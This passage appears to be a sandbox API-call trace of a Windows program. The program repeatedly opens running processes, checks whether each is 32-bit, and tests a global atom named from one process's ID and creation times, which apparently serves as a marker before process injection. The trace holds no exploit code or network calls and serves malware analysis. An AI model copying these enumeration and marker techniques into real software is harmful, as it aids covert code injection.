	[0116.426] CloseHandle (hObject=0x698) returned 1
	[0116.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.427] CloseHandle (hObject=0x698) returned 1
	[0116.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.427] CloseHandle (hObject=0x698) returned 1
	[0116.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.430] CloseHandle (hObject=0x698) returned 1
	[0116.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.430] CloseHandle (hObject=0x698) returned 1
	[0116.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.430] CloseHandle (hObject=0x698) returned 1
	[0116.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.430] CloseHandle (hObject=0x698) returned 1
	[0116.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.431] CloseHandle (hObject=0x698) returned 1
	[0116.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.431] CloseHandle (hObject=0x698) returned 1
	[0116.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.431] CloseHandle (hObject=0x698) returned 1
	[0116.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.431] CloseHandle (hObject=0x698) returned 1
	[0116.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.431] CloseHandle (hObject=0x698) returned 1
	[0116.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.432] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.432] CloseHandle (hObject=0x698) returned 1
	[0116.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.432] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.432] CloseHandle (hObject=0x698) returned 1
	[0116.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.432] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.432] CloseHandle (hObject=0x698) returned 1
	[0116.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.433] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.433] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.433] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.434] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.434] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.434] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.434] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.434] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.434] CloseHandle (hObject=0x698) returned 1
	[0116.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.434] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.435] CloseHandle (hObject=0x698) returned 1
	[0116.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.435] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.435] CloseHandle (hObject=0x698) returned 1
	[0116.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.435] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.435] CloseHandle (hObject=0x698) returned 1
	[0116.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.476] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.476] CloseHandle (hObject=0x698) returned 1
	[0116.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.476] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.476] CloseHandle (hObject=0x698) returned 1
	[0116.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.477] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.477] CloseHandle (hObject=0x698) returned 1
	[0116.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.477] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.477] CloseHandle (hObject=0x698) returned 1
	[0116.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.477] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.477] CloseHandle (hObject=0x698) returned 1
	[0116.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.478] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.478] CloseHandle (hObject=0x698) returned 1
	[0116.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.478] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.478] CloseHandle (hObject=0x698) returned 1
	[0116.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.478] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.478] CloseHandle (hObject=0x698) returned 1
	[0116.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.478] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.478] CloseHandle (hObject=0x698) returned 1
	[0116.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.479] CloseHandle (hObject=0x698) returned 1
	[0116.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.479] CloseHandle (hObject=0x698) returned 1
	[0116.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.479] CloseHandle (hObject=0x698) returned 1
	[0116.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.479] CloseHandle (hObject=0x698) returned 1
	[0116.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.479] CloseHandle (hObject=0x698) returned 1
	[0116.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.480] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.480] CloseHandle (hObject=0x698) returned 1
	[0116.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.480] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.480] CloseHandle (hObject=0x698) returned 1
	[0116.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.480] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.480] CloseHandle (hObject=0x698) returned 1
	[0116.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.480] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.480] CloseHandle (hObject=0x698) returned 1
	[0116.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.480] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.480] CloseHandle (hObject=0x698) returned 1
	[0116.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.481] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.481] CloseHandle (hObject=0x698) returned 1
	[0116.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.481] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.481] CloseHandle (hObject=0x698) returned 1
	[0116.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.481] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.481] CloseHandle (hObject=0x698) returned 1
	[0116.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.481] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.481] CloseHandle (hObject=0x698) returned 1
	[0116.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.482] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.482] CloseHandle (hObject=0x698) returned 1
	[0116.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.482] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.482] CloseHandle (hObject=0x698) returned 1
	[0116.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.482] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.482] CloseHandle (hObject=0x698) returned 1
	[0116.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.482] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.482] CloseHandle (hObject=0x698) returned 1
	[0116.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.482] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.482] CloseHandle (hObject=0x698) returned 1
	[0116.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.483] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.483] CloseHandle (hObject=0x698) returned 1
	[0116.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.483] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.483] CloseHandle (hObject=0x698) returned 1
	[0116.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.483] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.483] CloseHandle (hObject=0x698) returned 1
	[0116.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.484] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.484] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.484] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.484] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.485] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.485] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.485] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.485] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.485] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.485] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.486] CloseHandle (hObject=0x698) returned 1
	[0116.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.486] CloseHandle (hObject=0x698) returned 1
	[0116.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.486] CloseHandle (hObject=0x698) returned 1
	[0116.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.486] CloseHandle (hObject=0x698) returned 1
	[0116.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.528] CloseHandle (hObject=0x698) returned 1
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.528] CloseHandle (hObject=0x698) returned 1
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.528] CloseHandle (hObject=0x698) returned 1
	[0116.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.529] CloseHandle (hObject=0x698) returned 1
	[0116.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.529] CloseHandle (hObject=0x698) returned 1
	[0116.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.529] CloseHandle (hObject=0x698) returned 1
	[0116.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.529] CloseHandle (hObject=0x698) returned 1
	[0116.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.530] CloseHandle (hObject=0x698) returned 1
	[0116.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.530] CloseHandle (hObject=0x698) returned 1
	[0116.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.530] CloseHandle (hObject=0x698) returned 1
	[0116.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.530] CloseHandle (hObject=0x698) returned 1
	[0116.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.530] CloseHandle (hObject=0x698) returned 1
	[0116.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.531] CloseHandle (hObject=0x698) returned 1
	[0116.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.531] CloseHandle (hObject=0x698) returned 1
	[0116.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.531] CloseHandle (hObject=0x698) returned 1
	[0116.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.531] CloseHandle (hObject=0x698) returned 1
	[0116.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.531] CloseHandle (hObject=0x698) returned 1
	[0116.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.532] CloseHandle (hObject=0x698) returned 1
	[0116.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.532] CloseHandle (hObject=0x698) returned 1
	[0116.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.532] CloseHandle (hObject=0x698) returned 1
	[0116.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.532] CloseHandle (hObject=0x698) returned 1
	[0116.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.533] CloseHandle (hObject=0x698) returned 1
	[0116.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.533] CloseHandle (hObject=0x698) returned 1
	[0116.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.533] CloseHandle (hObject=0x698) returned 1
